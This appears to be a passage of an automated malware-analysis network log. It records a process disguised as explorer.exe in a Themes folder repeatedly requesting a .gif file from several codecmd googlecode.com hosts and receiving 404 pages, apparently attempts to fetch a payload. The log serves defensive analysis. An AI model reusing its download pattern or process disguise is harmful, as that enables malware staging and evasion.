                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:59.171070099 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              124192.168.2.651276142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:59.550211906 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:00.236514091 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:00 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:00.236566067 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              125192.168.2.65127764.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:00.675834894 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:01.380402088 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:01 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:01.380462885 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              126192.168.2.651278173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:01.792531013 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:02.567188025 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:02 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:02.567222118 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              127192.168.2.651279142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:03.032748938 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:03.888807058 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:03 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:03.888833046 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:11:03.888849974 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              128192.168.2.65128064.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:04.281773090 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:04.965609074 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:04 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:04.965662956 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              129192.168.2.651281173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:05.400407076 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:06.212605000 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:05 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:06.212632895 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:11:06.212676048 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              130192.168.2.651282142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:06.708652973 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:07.402935028 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:07 GMT
